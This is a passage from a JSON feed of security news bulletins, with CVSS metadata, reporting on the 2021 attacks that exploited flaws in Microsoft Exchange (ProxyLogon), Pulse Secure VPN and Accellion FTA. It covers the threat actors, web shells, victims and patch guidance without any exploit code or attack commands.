purposes.\n\n[](<https://thehackernews.com/images/-_eUnJYSlv7A/YD86dcga76I/AAAAAAAAB7Y/Ex1kb11XGtcD6b878ASeDzA-SFz8SSzNgCLcBGAsYHQ/s0/ms.jpg>)\n\nFurthermore, since the initial attack requires an untrusted connection to Exchange server port 443, the company notes that organizations can mitigate the issue by restricting untrusted connections or by using a VPN to separate the Exchange server from external access.\n\nMicrosoft, besides stressing that the exploits were not connected to the SolarWinds-related breaches, said it has briefed appropriate U.S. government agencies about the new wave of attacks. But the company didn't elaborate on how many organizations were targeted and whether the attacks were successful.\n\nStating that the intrusion campaigns appeared to have started around January 6, 2021, Volexity cautioned it has detected active in-the-wild exploitation of multiple Microsoft Exchange vulnerabilities used to steal email and compromise networks.\n\n\"While the attackers appear to have initially flown largely under the radar by simply stealing emails, they recently pivoted to launching exploits to gain a foothold,\" Volexity researchers Josh Grunzweig, Matthew Meltzer, Sean Koessel, Steven Adair, and Thomas Lancaster [explained](<https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/>) in a write-up.\n\n\"From Volexity's perspective, this exploitation appears to involve multiple operators using a wide variety of tools and methods for dumping credentials, moving laterally, and further backdooring systems.\"\n\nAside from the patches, Microsoft Senior Threat Intelligence Analyst Kevin Beaumont has also [created](<https://twitter.com/GossiTheDog/status/1366858907671552005>) a [nmap plugin](<https://github.com/GossiTheDog/scanning/blob/main/http-vuln-exchange.nse>) that can be used to scan a network for potentially vulnerable Microsoft Exchange servers.\n\nGiven the severity of the flaws, it's no surprise that patches have been rolled out a week ahead of the company's Patch Tuesday schedule, which is typically reserved for the second Tuesday of each month. Customers using a vulnerable version of Exchange Server are recommended to install the updates immediately to thwart these attacks.\n\n\"Even though we've worked quickly to deploy an update for the Hafnium exploits, we know that many nation-state actors and criminal groups will move quickly to take advantage of any unpatched systems,\" Microsoft's Corporate Vice President of Customer Security, Tom Burt, [said](<https://blogs.microsoft.com/on-the-issues/2021/03/02/new-nation-state-cyberattacks/>). \"Promptly applying today's patches is the best protection against this attack.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-03T07:28:00", "type": "thn", "title": "URGENT \u2014 4 Actively Exploited 0-Day Flaws Found in Microsoft Exchange", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-03T07:56:35", "id": "THN:9AB21B61AFE09D4EEF533179D0907C03", "href": "https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:39:04", "description": "[](<https://thehackernews.com/images/-LOLhcDcH4Q0/YEX4fZpKfUI/AAAAAAAAB9w/I0oQNqeVV2YmhlyC8lyvV-LztA9giv0vACLcBGAsYHQ/s0/microsoft-exchange-hacking.jpg>)\n\nMicrosoft on Friday warned of active attacks exploiting [unpatched Exchange Servers](<https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html>) carried out by multiple threat actors, as the hacking campaign is believed to have infected tens of thousands of businesses, government entities in the U.S., Asia, and Europe.\n\nThe company [said](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) \"it continues to see increased use of these vulnerabilities in attacks targeting unpatched systems by multiple malicious actors beyond HAFNIUM,\" signaling an escalation that the breaches are no longer \"limited and targeted\" as was previously deemed.\n\nAccording to independent cybersecurity journalist [Brian Krebs](<https://krebsonsecurity.com/2021/03/at-least-30000-u-s-organizations-newly-hacked-via-holes-in-microsofts-email-software/>), at least 30,000 entities across the U.S. \u2014 mainly small businesses, towns, cities, and local governments \u2014 have been compromised by an \"unusually aggressive\" Chinese group that has set its sights on stealing emails from victim organizations by exploiting previously undisclosed flaws in Exchange Server.\n\nVictims are also being reported from outside the U.S., with email systems belonging to businesses in [Norway](<https://nsm.no/aktuelt/oppdater-microsoft-exchange-snarest>), the [Czech Republic](<https://nukib.cz/cs/infoservis/hrozby/1692-vyjadreni-k-aktualni-situaci/>) and the [Netherlands](<https://www.ncsc.nl/actueel/nieuws/2021/maart/8/40-nl-microsoft-exchange-servers-nog-steeds-kwetsbaar>) impacted in a series of hacking incidents abusing the vulnerabilities. The Norwegian National Security Authority said it has implemented a vulnerability scan of IP addresses in the country to identify vulnerable Exchange servers and \"continuously notify these companies.\"\n\nThe colossal scale of the ongoing offensive against Microsoft's email servers also eclipses the [SolarWinds hacking spree](<https://thehackernews.com/2020/12/nearly-18000-solarwinds-customers.html>) that came to light last December, which is said to have targeted as many as 18,000 customers of the IT management tools provider. But as it was with the SolarWinds hack, the attackers are likely to have only gone after high-value targets based on an initial reconnaissance of the victim machines.\n\n### Unpatched Exchange Servers at Risk of Exploitation\n\nA successful [exploitation of the flaws](<https://unit42.paloaltonetworks.com/microsoft-exchange-server-vulnerabilities/>) allows the adversaries to break into Microsoft Exchange Servers in target environments and subsequently allow the installation of unauthorized web-based backdoors to facilitate long-term access. With multiple threat actors leveraging these zero-day vulnerabilities, the post-exploitation activities are expected to differ from one group to the other based on their motives.\n\nChief among the vulnerabilities is CVE-2021-26855, also called \"ProxyLogon\" (no connection to ZeroLogon), which permits an attacker to bypass the authentication of an on-premises Microsoft Exchange Server that's able to receive untrusted connections from an external source on port 443. This is followed by the exploitation of CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 post-authentication, allowing the malicious party to gain remote access.\n\nTaiwanese cybersecurity firm Devcore, which began an internal audit of Exchange Server security in October last year, [noted in a timeline](<https://proxylogon.com/>) that it discovered both CVE-2021-26855 and CVE-2021-27065 within a 10-day period between December 10-20, 2020. After chaining these bugs into a workable pre-authentication RCE exploit, the company said it reported the issue to Microsoft on January 5, 2021, suggesting that Microsoft had almost two months to release a fix.\n\n[](<https://thehackernews.com/images/-zR_JCeV5Moo/YEX5KX2rxLI/AAAAAAAAB94/XG6lQGCnfO0ZUBwgiwv9agIbi4TfP1csACLcBGAsYHQ/s0/microsoft-exchange-hacking.jpg>)\n\nThe four security issues in question were eventually [patched by Microsoft](<https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html>) as part of an emergency out-of-band security update last Tuesday, while warning that \"many nation-state actors and criminal groups will move quickly to take advantage of any unpatched systems.\"\n\nThe fact that Microsoft also patched Exchange Server 2010 suggests that the vulnerabilities have been lurking in the code for more than ten years.\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA), which released an [emergency directive](<https://thehackernews.com/2021/03/cisa-issues-emergency-directive-on-in.html>) warning of \"active exploitation\" of the vulnerabilities, urged government agencies running vulnerable versions of Exchange Server to either update the software or disconnect the products from their networks.\n\n\"CISA is aware of widespread domestic and international exploitation of Microsoft Exchange Server vulnerabilities and urges scanning Exchange Server logs with Microsoft's IoC detection tool to help determine compromise,\" the agency [tweeted](<https://twitter.com/USCERT_gov/status/1368216461571919877>) on March 6.\n\nIt's worth noting that merely installing the patches issued by Microsoft would have no effect on servers that have already been backdoored. Organizations that have been breached to deploy the web shell and other post-exploitation tools continue to remain at risk of future compromise until the artifacts are completely rooted out from their networks.\n\n### Multiple Clusters Spotted\n\nFireEye's Mandiant threat intelligence team [said](<https://www.fireeye.com/blog/threat-research/2021/03/detection-response-to-exploitation-of-microsoft-exchange-zero-day-vulnerabilities.html>) it \"observed multiple instances of abuse of Microsoft Exchange Server within at least one client environment\" since the start of the year. Cybersecurity firm Volexity, one of the firms credited with discovering the flaws, said the intrusion campaigns appeared to have started around January 6, 2021.\n\nNot much is known about the identities of the attackers, except that Microsoft has primarily attributed the exploits with high confidence to a group it calls Hafnium, a skilled government-backed group operating out of China. Mandiant is tracking the intrusion activity in three clusters, UNC2639, UNC2640, and UNC2643, adding it expects the number to increase as more attacks are detected.\n\nIn a statement to [Reuters](<https://www.reuters.com/article/us-usa-cyber-microsoft/more-than-20000-u-s-organizations-compromised-through-microsoft-flaw-source-idUSKBN2AX23U>), a Chinese government spokesman denied the country was behind the intrusions.\n\n\"There are at least five different clusters of activity that appear to be exploiting the vulnerabilities,\" [said](<https://twitter.com/redcanary/status/1368289931970322433>) Katie Nickels, director of threat intelligence at Red Canary, while noting the differences in the techniques and infrastructure from that of the Hafnium actor.\n\nIn one particular instance, the cybersecurity firm [observed](<https://twitter.com/redcanary/status/1367935292724948992>) that some of the customers compromised Exchange servers had been deployed with a crypto-mining software called [DLTminer](<https://www.carbonblack.com/blog/cb-tau-technical-analysis-dltminer-campaign-targeting-corporations-in-asia/>), a malware documented by Carbon Black in 2019.\n\n\"One possibility is that Hafnium adversaries shared or sold exploit code, resulting in other groups being able to exploit these vulnerabilities,\" Nickels said. \"Another is that adversaries could have reverse engineered the patches released by Microsoft to independently figure out how to exploit the vulnerabilities.\"\n\n### Microsoft Issues Mitigation Guidance\n\nAside from rolling out fixes, Microsoft has published new alternative mitigation guidance to help Exchange customers who need more time to patch their deployments, in addition to pushing out a new update for the Microsoft Safety Scanner (MSERT) tool to detect web shells and [releasing a script](<https://github.com/microsoft/CSS-Exchange/tree/main/Security>) for checking HAFNIUM indicators of compromise. They can be found [here](<https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021/>).\n\n\"These vulnerabilities are significant and need to be taken seriously,\" Mat Gangwer, senior director of managed threat response at Sophos said. \"They allow attackers to remotely execute commands on these servers without the need for credentials, and any threat actor could potentially abuse them.\"\n\n\"The broad installation of Exchange and its exposure to the internet mean that many organizations running an on-premises Exchange server could be at risk,\" Gangwer added.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-08T10:15:00", "type": "thn", "title": "Microsoft Exchange Cyber Attack \u2014 What Do We Know So Far?", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-10T08:44:19", "id": "THN:9DB02C3E080318D681A9B33C2EFA8B73", "href": "https://thehackernews.com/2021/03/microsoft-exchange-cyber-attack-what-do.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:38:16", "description": "[](<https://thehackernews.com/images/-IPYvggwn6XM/YJD7KaAKMwI/AAAAAAAACck/8bYszyL6u9IfDFcNzx4jcnFXKFQMRJ5NQCLcBGAsYHQ/s0/pulse-vpn.jpg>)\n\nIvanti, the company behind Pulse Secure VPN appliances, has released a security patch to remediate a critical security vulnerability that was found being actively exploited in the wild by at least two different threat actors.\n\nTracked as [CVE-2021-22893](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784/>) (CVSS score 10), the flaw concerns \"multiple use after free\" issues in Pulse Connect Secure that could allow a remote unauthenticated attacker to execute arbitrary code and take control of the affected system. All Pulse Connect Secure versions prior to 9.1R11.4 are impacted.\n\nThe flaw came to light on April 20 after FireEye [disclosed](<https://thehackernews.com/2021/04/warning-hackers-exploit-unpatched-pulse.html>) a series of intrusions targeting defense, government, and financial organizations in the U.S. and elsewhere by leveraging critical vulnerabilities in the remote access solution to bypass multi-factor authentication protections and breach enterprise networks.\n\nThe development promoted the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to issue an [Emergency Directive](<https://www.cisa.gov/news/2021/04/20/cisa-issues-emergency-directive-requiring-federal-agencies-check-pulse-connect>) urging federal agencies and civilian departments to mitigate any anomalous activity or active exploitation detected on their networks.\n\n[](<https://thehackernews.com/images/-MkjnmX9bSrs/YJD7dbZ3IQI/AAAAAAAACcs/Bz7ex--si1ots__08HdxtIU7xkoM1_fOACLcBGAsYHQ/s0/vpn-hacking.jpg>)\n\nFollowing an investigation conducted in conjunction with FireEye Mandiant, Ivanti said the attacks were observed on a \"very limited number\" of customer systems. FireEye is tracking the activity under two separate clusters UNC2630 and UNC2717 citing differences in the malicious web shells that were dropped on the compromised devices.\n\n\"As sophisticated threat actors continue their attacks on U.S. businesses and government agencies, we will continue to work with our customers, the broader security industry, law enforcement and government agencies to mitigate these threats,\" the Utah-based software firm [said](<https://blog.pulsesecure.net/pulse-connect-secure-patch-availability-sa44784/>).\n\n\"Companywide we are making significant investments to enhance our overall cybersecurity posture, including a more broad implementation of secure application development standards.\"\n\nPulse Secure customers are advised to move quickly to apply the update to ensure they are protected. The company has also released a [Pulse Connect Secure Integrity Tool](<https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB44755>) to check for signs of compromise and identify malicious activity on their systems.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-05-04T07:52:00", "type": "thn", "title": "Critical Patch Out for Critical Pulse Secure VPN 0-Day Under Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22893"], "modified": "2021-05-04T08:21:24", "id": "THN:4F47385B2D66DCA6F584F23C5F1AE0D0", "href": "https://thehackernews.com/2021/05/critical-patch-out-for-month-old-pulse.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:38:00", "description": "[](<https://thehackernews.com/images/-5_xyclMz6Yk/YLCbs0h4qJI/AAAAAAAACqc/R6kDUvjXi4UUR6-c9IT_Sv2oMonJRBTOgCLcBGAsYHQ/s0/chinese-hackers.jpg>)\n\nCybersecurity researchers from FireEye unmasked additional tactics, techniques, and procedures (TTPs) adopted by Chinese threat actors who were recently found abusing Pulse Secure VPN devices to drop malicious web shells and exfiltrate sensitive information from enterprise networks.\n\nFireEye's Mandiant threat intelligence team, which is tracking the cyber espionage activity under two activity clusters UNC2630 and UNC2717, [said](<https://www.fireeye.com/blog/threat-research/2021/05/updates-on-chinese-apt-compromising-pulse-secure-vpn-devices.html>) the intrusions line up with key Chinese government priorities, adding \"many compromised organizations operate in verticals and industries aligned with Beijing's strategic objectives outlined in China's recent [14th Five Year Plan](<https://en.wikipedia.org/wiki/Five-year_plans_of_China#Fourteenth_plan_\\(2021%E2%80%932025\\)>).\"\n\nOn April 20, the cybersecurity firm [disclosed](<https://thehackernews.com/2021/04/warning-hackers-exploit-unpatched-pulse.html>) 12 different malware families, including STEADYPULSE and LOCKPICK, that have been designed with the express intent to infect Pulse Secure VPN appliances and put to use by at least two cyber espionage groups believed to be affiliated with the Chinese government.\n\n * UNC2630 - SLOWPULSE, RADIALPULSE, THINBLOOD, ATRIUM, PACEMAKER, SLIGHTPULSE, and PULSECHECK\n * UNC2717 - HARDPULSE, QUIETPULSE, AND PULSEJUMP\n\nFireEye's continued investigation into the attacks as part of its incident response efforts has uncovered four more malware families deployed by UNC2630 \u2014 BLOODMINE, BLOODBANK, CLEANPULSE, and RAPIDPULSE \u2014 for purposes of harvesting credentials and sensitive system data, allowing arbitrary file execution, and removing forensic evidence.\n\n[](<https://thehackernews.com/images/-NSSEZWK9pjk/YLCaJqPCIUI/AAAAAAAACqU/AnObAGs5rNM92xF_myGkjOHr3neFaXDgQCLcBGAsYHQ/s0/data.jpg>)\n\nIn addition, the threat actors were also observed removing web shells, ATRIUM, and SLIGHTPULSE, from dozens of compromised VPN devices between April 17 and April 20 in what the researchers describe as \"unusual,\" suggesting \"this action displays an interesting concern for operational security and a sensitivity to publicity.\"\n\nAt the heart of these intrusions lies [CVE-2021-22893](<https://thehackernews.com/2021/05/critical-patch-out-for-month-old-pulse.html>), a recently patched vulnerability in Pulse Secure VPN devices that the adversaries exploited to gain an initial foothold on the target network, using it to steal credentials, escalate privileges, conduct internal reconnaissance by moving laterally across the network, before maintaining long-term persistent access, and accessing sensitive data.\n\n\"Both UNC2630 and UNC2717 display advanced tradecraft and go to impressive lengths to avoid detection. The actors modify file timestamps and regularly edit or delete forensic evidence such as logs, web server core dumps, and files staged for exfiltration,\" the researchers said. \"They also demonstrate a deep understanding of network appliances and advanced knowledge of a targeted network. This tradecraft can make it difficult for network defenders to establish a complete list of tools used, credentials stolen, the initial intrusion vector, or the intrusion start date.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-05-28T07:29:00", "type": "thn", "title": "Chinese Cyber Espionage Hackers Continue to Target Pulse Secure VPN Devices", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22893"], "modified": "2021-05-29T08:17:43", "id": "THN:603F844B99A1CC0CF1DE580659626B57", "href": "https://thehackernews.com/2021/05/chinese-cyber-espionage-hackers.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2021-03-23T14:28:35", "description": "Energy giant Royal Dutch Shell is the latest victim of a series of attacks on users of the Accellion legacy File Transfer Appliance (FTA) product, which already has affected numerous companies and been [attributed](<https://threatpost.com/accellion-zero-day-attacks-clop-ransomware-fin11/164150/>) to the FIN11 and the Clop ransomware gang.\n\n\u201cShell has been impacted by a data-security incident involving Accellion\u2019s File Transfer Appliance,\u201d the company revealed [on its website](<https://www.shell.com/energy-and-innovation/digitalisation/news-room/third-party-cyber-security-incident-impacts-shell.html>) last week. \u201cShell uses this appliance to securely transfer large data files.\u201d\n\nAttackers \u201cgained access to \u201cvarious files\u201d containing personal and company data from both Shell and some of its stakeholders, acknowledged the company. However, because its Accellion implementation its core IT systems were unaffected by the breach, \u201cas the file transfer service is isolated from the rest of Shell\u2019s digital infrastructure,\u201d the company said.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nShell, the fifth largest company in the world, also revealed several of its global petrochemical and energy company affiliates were impacted.\n\nAccording to the company, once it learned of the incident, Shell immediately addressed the vulnerabilities with its service provider and cybersecurity team, and started an investigation to better understand the nature and extent of the incident.\n\n\u201cShell is in contact with the impacted individuals and stakeholders and we are working with them to address possible risks,\u201d the company said in a statement. \u201cWe have also been in contact with relevant regulators and authorities and will continue to do so as the investigation continues.\u201d\n\nShell did not say specifically how attackers accessed its Accellion implementation, but the breach is likely related to a series of attacks on vulnerabilities in Accellion FTA, a 20-year-old legacy product used by large corporations around the world. Accellion revealed that it became aware of a then zero-day security vulnerability in the product in mid-December, and subsequently scrambled to patch it.\n\nHowever, the first flaw turned out to be just one of a cascade of now patched zero-day bugs in the platform that Accellion discovered only after they came under attack from cyber-adversaries well into the new year, the company acknowledged. Other victims of third-party attacks on Accellion FTA include [Jones Day Law Firm](<https://threatpost.com/stolen-jones-day-law-firm-files-posted/164066/>) and [telecom giant Singtel](<https://threatpost.com/singtel-zero-day-cyberattack/163938/>).\n\nEventually, four security vulnerabilities ([CVE-2021-27101](<https://nvd.nist.gov/vuln/detail/CVE-2021-27101>), [CVE-2021-27102](<https://nvd.nist.gov/vuln/detail/CVE-2021-27102>), [CVE-2021-27103](<https://nvd.nist.gov/vuln/detail/CVE-2021-27103>), [CVE-2021-27104](<https://nvd.nist.gov/vuln/detail/CVE-2021-27104>)) were found to be exploited in the attacks, according to the investigation. Accellion tried to patch each subsequent vulnerability as soon as it was discovered; however, as evidenced by Shell\u2019s disclosure, unpatched systems likely remain and further attacks seem likely.\n\nIndeed, patching is a complicated endeavor even for the most well-run IT organizations and many companies struggle to achieve complete coverage across their environments, observed Chris Clements, vice president of solutions architecture for cybersecurity firm [Cerberus Sentinel](<https://www.cerberussentinel.com/>), in an email to Threatpost.\n\n\u201cThis is especially true for non-Microsoft Windows based systems, the unfortunate reality is that for many organizations, their patching strategy starts and stops with Windows,\u201d he said. \u201cInfrastructure equipment and especially network appliances like Accellion often lag significantly in patch adoption.\u201d\n\nThere are a number of reasons for why patches aren\u2019t immediately applied when they\u2019re made available, including lack of communication from vendors when patches are released, complex and manual patching processes, and organizational confusion around who\u2019s responsible for patch application, Clements added.\n\nThe Accellion attacks also once again shed light on the importance of choosing technology partners carefully when relying on them for critical digital processes that are exposed to potential exploit, said another security expert.\n\n\u201cThe Shell data breach illustrates the criticality of securing vendors and ensuring their systems don\u2019t compromise your own business,\u201d Demi Ben-Ari, CTO and co-founder of security firm [Panorays](<https://www.panorays.com/>) said in an email to Threatpost. \u201cVulnerabilities in vendors\u2019 legacy software can serve as an easy gateway to breach data in target companies \u2014 or worse.\u201d\n\n**_[Register for this LIVE Event](<https://threatpost.com/webinars/economics-of-0-day-disclosures-the-good-bad-and-ugly/>)_****_: 0-Day Disclosures: Good, Bad & Ugly:_** **_On Mar. 24 at 2 p.m. ET_**_, Threatpost_ tackles how vulnerability disclosures can pose a risk to companies. To be discussed, Microsoft 0-days found in Exchange Servers. Join 0-day hunters from Intel Corp. and veteran bug bounty researchers who will untangle the 0-day economy and unpack what\u2019s on the line for all businesses when it comes to the disclosure process. [Register NOW](<https://threatpost.com/webinars/economics-of-0-day-disclosures-the-good-bad-and-ugly/>) for this **LIVE **webinar on Wed., Mar. 24.\n", "cvss3": {}, "published": "2021-03-23T14:16:14", "type": "threatpost", "title": "Energy Giant Shell Is Latest Victim of Accellion Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104"], "modified": "2021-03-23T14:16:14", "id": "THREATPOST:153B5C59C5DB1F87B3DFE2D673FA0030", "href": "https://threatpost.com/shell-victim-of-accellion-attacks/164973/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-22T18:12:09", "description": "Researchers have identified a set of threat actors (dubbed UNC2546 and UNC2582) with connections to the FIN11 and the Clop ransomware gang as the cybercriminal group behind the global zero-day attacks on users of the Accellion legacy File Transfer Appliance product.\n\n[](<https://threatpost.com/webinars/15-cybersecurity-gaffes-and-fixes-mid-size-businesses-face/?utm_source=ART&utm_medium=ART&utm_campaign=Feb_webinar>)\n\nClick to Register\n\nMultiple Accellion FTA customers, including the [Jones Day Law Firm](<https://threatpost.com/stolen-jones-day-law-firm-files-posted/164066/>), Kroger [and Singtel](<https://threatpost.com/singtel-zero-day-cyberattack/163938/>), have all been attacked by the group, receiving extortion emails threatening to publish stolen data on the \u201cCL0P^_- LEAKS\u201d .onion website, according to an investigation from Accellion and FireEye Mandiant. Around 100 companies have been victims of the attack, analysts found, with around 25 suffering \u201csignificant data theft.\u201d No ransomware was used in the attacks.\n\n\u201cNotably, the number of victims on the \u201cCL0P^_- LEAKS\u201d shaming website has increased in February 2021 with organizations in the United States, Singapore, Canada and the Netherlands recently outed by these threat actors,\u201d according to the Mandiant findings, [issued on Monday](<https://www.fireeye.com/blog/threat-research/2021/02/accellion-fta-exploitedfor-data-theft-and-extortion.html>).\n\n## **4 Accellion FTA Zero-Days **\n\nAs noted, the point of entry for the attacks was Accellion FTA, a 20-year-old legacy product used by large corporations around the world. Accellion said that it became aware of a zero-day security vulnerability in FTA in mid-December, which it scrambled to patch quickly. But that turned out to be just one of a cascade of zero-days in the platform that the company discovered only after they came under attack from cyber-adversaries.\n\n\u201cThis initial incident was the beginning of a concerted cyberattack on the Accellion FTA product that continued into January 2021,\u201d the company explained. \u201cAccellion identified additional exploits in the ensuing weeks, and rapidly developed and released patches to close each vulnerability.\u201d\n\nFour zero-day security holes were exploited in the attacks, according to the investigation:\n\n * CVE-2021-27101 \u2013 SQL injection via a crafted Host header\n * CVE-2021-27102 \u2013 OS command execution via a local web service call\n * CVE-2021-27103 \u2013 SSRF via a crafted POST request\n * CVE-2021-27104 \u2013 OS command execution via a crafted POST request\n\nAnd, the published victim data appears to have been stolen using a distinct \u201cDEWMODE\u201d web shell, according to Mandiant, which added, \u201cThe exfiltration activity has affected entities in a wide range of sectors and countries.\u201d\n\n## **DEWMODE Web Shell for Stealing Information**\n\nMandiant found that a specific web shell, which it calls DEWMODE, was used to exfiltrate data from Accellion FTA devices. The adversaries first exploited one of the zero-days, then used that access to install DEWMODE.\n\n\u201cAcross these incidents, Mandiant observed common infrastructure usage and TTPs [tactics, techniques and procedures], including exploitation of FTA devices to deploy the DEWMODE web shell,\u201d Mandiant determined. \u201cA common threat actor we now track as UNC2546 was responsible for this activity. While complete details of the vulnerabilities leveraged to install DEWMODE are still being analyzed, evidence from multiple client investigations has shown multiple commonalities in UNC2546\u2019s activities.\u201d\n\nThe firm is still analyzing the zero-day exploitation, but it did say that in the early attacks in December, UNC2546 leveraged an SQL injection vulnerability in the Accellion FTA as its primary intrusion vector. SQL injection was then followed by subsequent requests to additional resources.\n\n\u201cUNC2546 has leveraged this SQL injection vulnerability to retrieve a key which appears to be used in conjunction with a request to the file sftp_account_edit.php,\u201d according to the analysis. \u201cImmediately after this request, the built-in Accellion utility admin.pl was executed, resulting in an eval web shell being written to oauth.api. Almost immediately following this sequence, the DEWMODE web shell is written to the system.\u201d\n\nDEWMODE, once embedded, extracts a list of available files from a MySQL database on the FTA and lists those files and corresponding metadata\u2014file ID, path, filename, uploader and recipient\u2014on an HTML page. UNC2546 then uses the presented list to download files through the DEWMODE web shell.\n\nIn a subset of incidents, Mandiant observed UNC2546 requesting a file named cache.js.gz \u2013 an archive that likely contained a dump of a database.\n\n## **Extortion via Clop Leaks Site**\n\nOnce DEWMODE was installed, victims began to receive extortion emails from an actor claiming association with the Clop ransomware team gang.\n\nThese are tailored to each victim and sent from a free 